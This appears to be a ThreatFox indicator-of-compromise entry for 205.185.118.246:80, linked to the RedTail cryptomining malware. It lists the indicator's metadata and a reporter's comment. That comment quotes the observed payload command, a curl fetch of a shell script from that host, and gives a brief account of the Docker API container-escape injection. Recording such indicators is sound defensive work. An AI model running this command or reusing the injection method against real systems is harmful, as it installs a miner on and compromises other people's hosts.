ThreatFox IOC Database

You are viewing the ThreatFox database entry for ip:port 205.185.118.246:80.

Database Entry


IOC ID: 1816896
IOC: 205.185.118.246:80
IOC Type: ip:port
Threat Type: payload_delivery
Malware: RedTail
Confidence Level: High (90%)
Is compromised?: False
ASN: AS53667 PONYNET
Country: CA
First seen: 2026-05-21 11:55:15 UTC
Last seen: never
UUID: 20ca6622-54ed-11f1-b930-42010aa4000a
Reporter: nullblue67
Reward: 5 credits from ThreatFox
Tags: b2f628, cronb-loader, docker-exploit, Downloader

nullblue67
Captured 2026-05-21 in Docker API exploit body. Payload: curl http://205.185.118.246/b2f628/cronb.sh - injected via Docker /containers/create with chroot /mnt/ escape. Drops redtail XMRig miner. 14/91 VT detections.